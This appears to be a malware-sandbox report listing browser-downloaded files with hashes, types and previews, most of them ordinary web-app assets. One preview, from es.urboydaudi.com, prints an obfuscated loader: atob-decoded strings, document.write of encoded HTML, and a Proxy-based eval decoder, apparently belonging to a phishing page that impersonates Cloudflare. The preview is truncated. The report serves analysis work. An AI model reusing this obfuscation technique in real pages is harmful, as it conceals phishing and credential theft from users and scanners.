                                                                                        Preview:import{r as o,J as b,Y as v,j as e,bC as y,bz as j,bA as g,bB as S,d as s,bG as C,bF as N,bE as c,B as M,X as k,dj as R}from"./index.CmaSzYmM.js";function E({title:l,titleId:a,...x},r){return o.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:r,"aria-labelledby":a},x),l?o.createElement("title",{id:a},l):null,o.createElement("path",{fillRule:"evenodd",d:"M5.47 5.47a.75.75 0 0 1 1.06 0L12 10.94l5.47-5.47a.75.75 0 1 1 1.06 1.06L13.06 12l5.47 5.47a.75.75 0 1 1-1.06 1.06L12 13.06l-5.47 5.47a.75.75 0 0 1-1.06-1.06L10.94 12 5.47 6.53a.75.75 0 0 1 0-1.06Z",clipRule:"evenodd"}))}const B=o.forwardRef(E),L=l=>{const a=o.useRef(l);a.current=l,o.useEffect(()=>()=>{a.current()},[])},D=({open:l,depth:a,title:x,children:r,alignCenter:h=!1,onClose:p,disabled:d,description:u,onSubmit:_,submitText:m="Submit",destructive:f=!1,size:t="full-wd"})=>{const{numOpenModals:i,setNumOpenModals:w}=b(),n=v();retu
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (48238)
                                                                                        Category:downloaded
                                                                                        Size (bytes):48239
                                                                                        Entropy (8bit):5.343293551896254
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:781E3D70AD7285932B560AF603AE0CF5
                                                                                        SHA1:05DCF1FBCD9BE56DC5FC3C2816EF3C0283C59C1B
                                                                                        SHA-256:F3C3760A932B9639CC554025300C8917E00F4F62E261086F5606C9E3A30D4836
                                                                                        SHA-512:05411E974DCEFB50C9D20E932C91EFB50093FE815362893C511DCAC94A87B75436FA68301D8682CEBE49F6792BE61E7F39D5D1F0725A43A5D92F9AC17BD9F82C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/b0e4a89976ce/api.js
                                                                                        Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 534230
                                                                                        Category:downloaded
                                                                                        Size (bytes):108511
                                                                                        Entropy (8bit):7.997607386239487
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:ABA366960123F577132BCEEB78F1FE56
                                                                                        SHA1:F146228069810EDC72E0687E9EEF199C69242877
                                                                                        SHA-256:61E23A261E447A85317A6574D5EB018FE6E653930B2749508700D020511D7789
                                                                                        SHA-512:A1761D5001F38A7BA21F2A58E044D814B30901693F0DDDC8F69192278858BE45F95BCA979926D1C8B37FABC801F8F9D87EB7AC64322B2B6FA0102F1AABFFD19C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://js.intercomcdn.com/vendors~app.bffb7b75.js
                                                                                        Preview:...........{.........\....e*0.,3..Yru.MU....d......R|......A.r.G....{ggg..Yo...:..7......I..I.8.fWg...U.77'.~.z2~...........+..I:,.,...r......a...;.^.L....i...<m].f...(o.a.=Y_^...,T[...m......u.]..?]..F...'.W'..FE..n&...g... ..0......`...n....E.{...,9ouCh..x.....?|..K.......;.Y.o.c....>.Mb.6...[hp...8....f.I..|.b.)......z9.G....$.(.....m.}he...l.f1...M8C...f.....8-.Q.^.o}...w......~H6..%...,k%i.f.._.....u....3.%.....A..Az......or.v.Y.P.6......].....#....s.FW..p/...}s.~.D....5@1-v...8o...d.......C....aw.....f..O.S.D....6i...#.`...o.^..4Z.w.^d......C........}.....;g..?..M......8..A.:..c.].>..1.Byg...&...`|..v....'o.$..6.r?x..... 9|.du.R..=I,!..?<I..!.&}dM;..@d...s..s.Uq.......2'.f.C2..Y0B..".....^q.l..q.....lO.~.clW.RNV|:..w...7.L:;{?... FT...0.?....^{;J.h!K..mE.V.6n.H.-.B+)...z=.#(.%....t`...z...#..Q..nmg.8..J)h(j.'.".2j.......t2.=.C/....^.p...R.~.:@6..e.0......8..F5....N7W.@q.-r/.R.......A.2 ....u.$)pc...........7..!......].2M..>PW.$.Y.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (899)
                                                                                        Category:downloaded
                                                                                        Size (bytes):900
                                                                                        Entropy (8bit):5.0405997816434835
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:51E77D6A74B12630CB600C7510B7C088
                                                                                        SHA1:3EAC2BD00D11C851AC0CDF2FA4AC6E32884B9910
                                                                                        SHA-256:D3FF9AF2F7C8B4E641D745B417E010BA6318B1AFCFB3A0D1B4747F999FC3B4C1
                                                                                        SHA-512:58D467BD450B0F34637ADE362A99DD9239A6AEBEA85C0FA1DE60FDD5A801770391EB4195EF20051F18DD90D207757BAD9F3D27DC2BB352DA19D7969FA7FB9BCF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/ActivateUser.sXFMIOsx.css
                                                                                        Preview:._appBackground_f9j6z_1{background-color:var(--authPageBg)}._formColors_f9j6z_5{background-color:var(--authFormBg);border-color:var(--authFormBorder)}._activeTab_f9j6z_10{color:var(--tabActiveText);border-bottom-color:var(--tabActiveBorder);border-bottom-width:var(--tabBottomBorderWidth);border-style:solid}._inactiveTab_f9j6z_17{color:var(--tabInactiveText);border-bottom-color:var(--tabInactiveBorder);border-bottom-width:var(--tabBottomBorderWidth);border-style:solid}._continueText_f9j6z_24{color:var(--grayText);background-color:var(--authFormBg)}._continueBorder_f9j6z_29{border-color:var(--grayLine)}._socialMediaButton_f9j6z_33{background-color:var(--white);border-color:var(--authFormBorder);color:var(--grayText)}._socialMediaButton_f9j6z_33:hover{background-color:var(--grayBase)}._roboto_f9j6z_44{font-family:Roboto;font-weight:500}._segoe_f9j6z_49{font-family:Segoe UI;font-weight:600}.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (661)
                                                                                        Category:dropped
                                                                                        Size (bytes):723
                                                                                        Entropy (8bit):5.3810478072824495
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F6231AF28438EAF16980667ED9F873CC
                                                                                        SHA1:D273E97FB588A303D4C1D320BAE9AFF866F2D4C0
                                                                                        SHA-256:0A623CBCF01B9CF50345FFDC5B08579EC1239ACBBB6102ED562A95986E863F8F
                                                                                        SHA-512:B0527B3E61EBE002F552DD1C2399497A36CB9BE662A1BF0716E1CDED0DE6D2F80FEF08E23D195723BE5E37DBF5089A9D0D6C81B5C62A3EFE67DF52A465312B72
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:import{r as e}from"./index.CmaSzYmM.js";function n({title:r,titleId:a,...l},t){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:t,"aria-labelledby":a},l),r?e.createElement("title",{id:a},r):null,e.createElement("path",{fillRule:"evenodd",d:"M8.485 2.495c.673-1.167 2.357-1.167 3.03 0l6.28 10.875c.673 1.167-.17 2.625-1.516 2.625H3.72c-1.347 0-2.189-1.458-1.515-2.625L8.485 2.495ZM10 5a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 10 5Zm0 9a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z",clipRule:"evenodd"}))}const c=e.forwardRef(n);export{c as F};.//# sourceMappingURL=ExclamationTriangleIcon.BNGKdN9E.js.map.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):22091
                                                                                        Entropy (8bit):6.0082754257756426
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:7A50BBCF4289A53A29EF6B82E9835140
                                                                                        SHA1:86E9702ED2206CF8F8DD706E30B4B4D341F1FABD
                                                                                        SHA-256:F5A28F3BC4203A400E82A60D5389B63DDD430C4B40FFCC28F6EE122733FF231F
                                                                                        SHA-512:6EC3688473366524A89F697A48E65E38516751FFA01C07E5AB5F69C6A051DBA5E0587F8A1D9D5F9A2E2E2323E144718D0CAD3FC81AB0728D45C1A54AC52009ED
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:svgjs="http://svgjs.dev/svgjs" width="364" height="362" viewBox="0 0 364 362"><image width="364" height="362" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAWwAAAFqCAYAAAA+xmCkAAAAAXNSR0IArs4c6QAAAHhlWElmTU0AKgAAAAgABAEaAAUAAAABAAAAPgEbAAUAAAABAAAARgEoAAMAAAABAAIAAIdpAAQAAAABAAAATgAAAAAAAADAAAAAAQAAAMAAAAABAAOgAQADAAAAAQABAACgAgAEAAAAAQAAAWygAwAEAAAAAQAAAWoAAAAAhdItlAAAAAlwSFlzAAAdhwAAHYcBj+XxZQAAActpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IlhNUCBDb3JlIDYuMC4wIj4KICAgPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4KICAgICAgPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIKICAgICAgICAgICAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIj4KICAgICAgICAgPGRjOnRpdGxlPgogICAgICAgICAgICA8cmRmOkFsdD4KICAgICAgICAgICAgICAgPHJkZjpsaSB4bWw6bGFuZz0ieC1kZWZhdWx0Ij5Jbm5vdmF0ZUVkdWNhdGlvbiAtIDE8L3JkZ
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (5960)
                                                                                        Category:dropped
                                                                                        Size (bytes):359502
                                                                                        Entropy (8bit):5.594719755629182
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:CD2BB05E4934C70B933BE87E2B7E3504
                                                                                        SHA1:A9562CD8050A60C5809CF61D9D36249E56FCF1B0
                                                                                        SHA-256:29AFF89F6249AA81E0FC14654BB588D79E2C3E9520A1782C3B51A81102D58E2B
                                                                                        SHA-512:635B2DA5B9D47BD20CD24A84A979813C3BB0B6EE608821BE015A6E7BE05ECFD70686FE58CDD46C51F0383AC61868EEA4D4462B577B88BE50857BB36CEEF4330A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (1039)
                                                                                        Category:dropped
                                                                                        Size (bytes):1091
                                                                                        Entropy (8bit):5.192497896896384
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C7689DD452D57FB745A6FAA6B6E5C336
                                                                                        SHA1:4171078F170A7C9E636AFBF594F5C98ADE0DDDBA
                                                                                        SHA-256:CA76E0779F3A56EE3B24C52A743A331D9AB1A5695D8D352A232C581DA9AA5ACA
                                                                                        SHA-512:2FC8405793727FC368BB338F1B98D6E945761CAB3E47FAD72CF878B051731918E99714E59C91B7657E72A7B1154D8DE964BD2D8016BBD207F4801910E35674C8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:import{r as n,j as t,B as r}from"./index.CmaSzYmM.js";class c extends n.Component{constructor(e){super(e),this.state={hasError:!1}}static getDerivedStateFromError(){return{hasError:!0}}componentDidCatch(e,s){console.error("Uncaught error:",e,s)}render(){return this.state.hasError?t.jsx("div",{className:"grid min-h-full place-items-center bg-white py-24 px-6 sm:py-32 lg:px-8",children:t.jsxs("div",{className:"text-center",children:[t.jsx("h1",{className:"mt-4 text-3xl font-bold tracking-tight text-gray-900 sm:text-5xl",children:"Something went wrong."}),t.jsx("p",{className:"mt-6 text-base leading-7 text-gray-600",children:"Sorry, we encountered an error and cannot load the page."}),t.jsxs("div",{className:"mt-10 flex items-center justify-center gap-x-6",children:[t.jsx(r,{type:"button",buttonText:"Reload Page",onClick:()=>{window.location.reload()},theme:"primary"}),t.jsx(r,{type:"button",buttonText:"Contact support",onClick:()=>{window.Intercom("show")},theme:"secondary"})]})]})}):thi
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (5833)
                                                                                        Category:downloaded
                                                                                        Size (bytes):25363
                                                                                        Entropy (8bit):5.178157673993994
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:565E8DD6453CDCE6CD2C1F202F35E419
                                                                                        SHA1:392FBBCED3D4071E2AC4AEBFC582461D2AC72A66
                                                                                        SHA-256:79E254E0D360E43BC4D46A3D2DBA13AC6207B6F6408EC244C3804853B7185FAF
                                                                                        SHA-512:3A42E5026F650C2EB9AF57B7B6848D7F300BA256AC84539D388115A20B4CE46FB00591A40689945B10A1A8E18AB1A2D58477F1BDB4CF3D3F1F16EB49CA3606CD
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/AiToolProvider.DS2zOm_j.js
                                                                                        Preview:import{r as i,G as S,o as ae,a as se,Q as w,ck as ie,j as le}from"./index.CmaSzYmM.js";import{U as re}from"./AITools.DdDAMa67.js";function ne({title:p,titleId:b,...e},s){return i.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:s,"aria-labelledby":b},e),p?i.createElement("title",{id:b},p):null,i.createElement("path",{fillRule:"evenodd",d:"M10 18a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm.75-11.25a.75.75 0 0 0-1.5 0v2.5h-2.5a.75.75 0 0 0 0 1.5h2.5v2.5a.75.75 0 0 0 1.5 0v-2.5h2.5a.75.75 0 0 0 0-1.5h-2.5v-2.5Z",clipRule:"evenodd"}))}const ge=i.forwardRef(ne),z=i.createContext({}),Ee=()=>i.useContext(z),oe=S.createContext({}),N=!0;function ue({baseColor:p,highlightColor:b,width:e,height:s,borderRadius:f,circle:q,direction:I,duration:A,enableAnimation:g=N,customHighlightBackground:c}){const u={};return I==="rtl"&&(u["--animation-direction"]="reverse"),typeof A=="number"&&(u["--animation-duration"]=
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, Unicode text, UTF-8 text, with very long lines (793)
                                                                                        Category:downloaded
                                                                                        Size (bytes):841
                                                                                        Entropy (8bit):5.267269402590162
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:37CA4AFBEFD920E6F9FC7A8DC36CCBC7
                                                                                        SHA1:812B7B0F6FDC9136B8BE3FD3C4AE06680CCE7DBC
                                                                                        SHA-256:D0776B7A8A652BADCC5E8F711A8532C7E5DB45FAEDC8211193AEC175C4204F70
                                                                                        SHA-512:F13D0494C6FDC3ED37EEBF6744D22888EAB308894437743FCD592DB5B93FF76CB8C3CA8AA56DEFB5A5742AF28486B21DD8A60DAE92369766F5C085E77DE6614E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Offline.Chq9LeuO.js
                                                                                        Preview:import{b as n,j as t,B as e}from"./index.CmaSzYmM.js";function o(){const s=n();return t.jsx("div",{className:"grid min-h-full place-items-center bg-white py-24 px-6 sm:py-32 lg:px-8",children:t.jsxs("div",{className:"text-center",children:[t.jsx("h1",{className:"mt-4 text-3xl font-bold tracking-tight text-gray-900 sm:text-5xl",children:"You're offline."}),t.jsx("p",{className:"mt-6 text-base leading-7 text-gray-600",children:"Sorry, we cannot load the page due to offline status."}),t.jsxs("div",{className:"mt-10 flex items-center justify-center gap-x-6",children:[t.jsx(e,{type:"button",buttonText:"Go back home",onClick:()=>{s("/")},theme:"primary"}),t.jsx(e,{type:"button",buttonText:"Contact support .",onClick:()=>{window.Intercom("show")},theme:"secondary"})]})]})})}export{o as O};.//# sourceMappingURL=Offline.Chq9LeuO.js.map.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 900045
                                                                                        Category:downloaded
                                                                                        Size (bytes):195183
                                                                                        Entropy (8bit):7.998543882992962
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:1A278B10840EE3866FE7DC6C58770950
                                                                                        SHA1:9ECA4142297BA0E19AB71469064987BA42F26DCA
                                                                                        SHA-256:CFCFD20AA41502B0F02377F64D98220B572E3BAB6EAEEFEF9CCB684C7FA76EE8
                                                                                        SHA-512:92EFBD4E605B4F0626EA0779B0E6AB87C10BCBA2CFE52B0B87EDDD416F2D2889B245EFDDAD5A5A921E2232B2D72C994023D4745978327645FF31C7D6D4059B1E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://js.intercomcdn.com/frame.cab515ec.js
                                                                                        Preview:...........yw.I./...).....R..\j...u..1sm`..py}.R...b.....o."kW.n..zt.R)+...-#".._....3k4.%.yb.'...8^....b..4O..|......y.Kz..s.....'..9.w...}...;_Nz(.._.3ka'...S{..>PR.;y.~g.....o...(.;....Q2..M...bx>.qW.(RZ..."...,-.J..<_..........n.5m/L....wg.b9.X.v.Y.....}o.L.3{..L.K..l6..[..zf..'}k<./G..?......iuv...............:zt..............vg/...S.Mr5.+.\.....Io.o...:.d>......I.]Lg.....=..-=.G..q<.U.NZ;/#...n......^H..#[..3/&.... .#W...<{.=_QUA..E/.^xB..V.0.E^....A.B~..K.B..-u.~.. fo..y.."7}...J{v ....(.P.F.r.X.|,...4-.n..~...E>U.'.@......?...Q`...0.Q %5...y.O..Ji.'....|.RH......A^..J.ne/f.l........z.l_J....W%]...5d^.#$.Q..a^...G.xT".....4o\h.+...GyM.+h.=O.I...+...C._...]_(..f....../.H..39..$Uh.~H.....&..:m."._'Eu.M|......X.zT.7..Xt....$..=%..].g..v."..,... .E...,_....!?0k8.S.......<.G....;...4.W=TBx6..Y...h;..T~....G.yR.:J.e1.KH.-;..a,.6.H.6..3...2.."..V9..(a{.g..t...s..../.w/.Q..^..zU.....b.g..x8O2<..8.A2i.kT.sb.Ng.T.\mO.....Zw...8s...8...=q.NC.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (1689)
                                                                                        Category:downloaded
                                                                                        Size (bytes):1690
                                                                                        Entropy (8bit):5.173421922994863
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:E0DC70877CAF4B4723C038160E685343
                                                                                        SHA1:E4A0EC3FBAB5D1F285A13E9F11AA476FECC24024
                                                                                        SHA-256:67B957FC45880E30C12F11BD59A1E70410C0DBC87E7CE52FA6922C9368F862C7
                                                                                        SHA-512:169C8110BD8A46008024C9AA4481816C1E82FFF1851F6A5B664FB813F3B6A4C1F21AF22D80D66E454FD35FB1F327DCE9C5FB521BE619DD779AF6A3C11E4D3CBB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Authenticated.C3teI_ol.css
                                                                                        Preview:._Secondary_Sidebar_zyy4z_1{display:flex;flex-shrink:0;background:var(--appBg);max-width:70%;transition:border-left .1s ease-in-out;z-index:1002;overflow-x:hidden;position:fixed;top:0;right:0;bottom:0}@media (min-width: 320px) and (max-width: 767px){._Secondary_Sidebar_zyy4z_1{position:absolute;top:0;right:0;bottom:0}}._Secondary_Sidebar_Content_zyy4z_32{position:fixed;top:0;bottom:0;border-left:1px solid var(--grayBorder)}._Resize_Handler_zyy4z_39{position:absolute;top:0;bottom:0;right:-1px;width:4px;cursor:col-resize}._Resize_Handler_zyy4z_39[dir=right]{right:auto;left:-1px}._Resize_Handler_zyy4z_39:hover{transition-delay:.6s;transition:background .3s ease-in-out;background:var(--slate5)}._Resize_Handler_zyy4z_39:after{content:"";position:absolute;top:0;bottom:0;right:-5px;width:12px}._Close_Button_zyy4z_68{position:absolute;top:18px;right:16px;width:36px;height:36px;border-radius:8px;cursor:pointer;display:flex;justify-content:center;align-items:center}._Close_Button_zyy4z_68:hover{
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (65364)
                                                                                        Category:downloaded
                                                                                        Size (bytes):184719
                                                                                        Entropy (8bit):4.43203328667008
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:22F7D251CB46CFE58A3CC8DD5188C02E
                                                                                        SHA1:0206AF1765EB7861CEE04ACCF90AA6FBF587FE37
                                                                                        SHA-256:1C56626F0F94AF7E170A89492CD9AD7CED589D68402C089FAA7F86A17FA3BD5C
                                                                                        SHA-512:5F920DBC009C210C57CEFA6E73661491B2C4BE78CCA0617B335226462FC858A1FB2D85B8E6C1A5B694DF3D7C413BB37890436E06CC2F47FEFC95D9E416E847FA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://es.urboydaudi.com/ZxoLb/
                                                                                        Preview:<script>.BPHhDNkDME = atob("aHR0cHM6Ly9YZC51cmJveWRhdWRpLmNvbS9aeG9MYi8=");.MQHqKNOAUo = atob("bm9tYXRjaA==");.epyzNeJfji = atob("d3JpdGU=");.if(BPHhDNkDME == MQHqKNOAUo){.document[epyzNeJfji](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIG5ldyBQcm94eSh7fSwgeyAKICBnZXQ6IGZ1bmN0aW9uKF8sIGtleSkgeyAKICAgIHJldHVybiBldmFsKFsuLi5rZXldCiAgICAgIC5tYXAoY2hhciA9PiArKCfvvqAnID4gY2hhcikpCiAgICAgIC5qb2luKCcnKQogICAgICAucmVwbGFjZSgvLns4fS9nLCBieXRlID0+IFN0cmluZy5mcm9tQ2hhckNvZGUocGFyc2VJbnQoYnl0ZSwgMikpKQogICAgKTsKICB9IAp9KS4NCu++oOOFpOO
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (348)
                                                                                        Category:downloaded
                                                                                        Size (bytes):349
                                                                                        Entropy (8bit):4.785262666302624
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:0CB7624CAB0A4D5C6D187B65BF87CC42
                                                                                        SHA1:F19804E65EC30340582ADC7932F8D4FB1235A3FE
                                                                                        SHA-256:9CCAD3E7BAD9FBFE3753B3E72E101F29CE1F151DA15A303AF9BACCDFC74323F8
                                                                                        SHA-512:20FBF4C5ADDE3C0BFA00DFCA86979701F8F7FCEFEAAFF052A6BE0488C1E41BE59FA5454BFE524C1BE63988E0470CE4147DA83E19A5BBC5C74A7D3F12546C6B48
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/index.CpbEpqIL.css
                                                                                        Preview:._tooltip_1l9cn_1{z-index:var(--z-above);padding:var(--space-2) var(--space-5);border:1px solid var(--color-tooltip-border);background:var(--color-tooltip);border-radius:var(--radius-sm);box-shadow:var(--shadow-lg);color:var(--color-tooltip-text);font-size:var(--size-sm);font-weight:500;animation:.15s ease-in-out;z-index:10000001;max-width:14rem}.
                                                                                        No static file info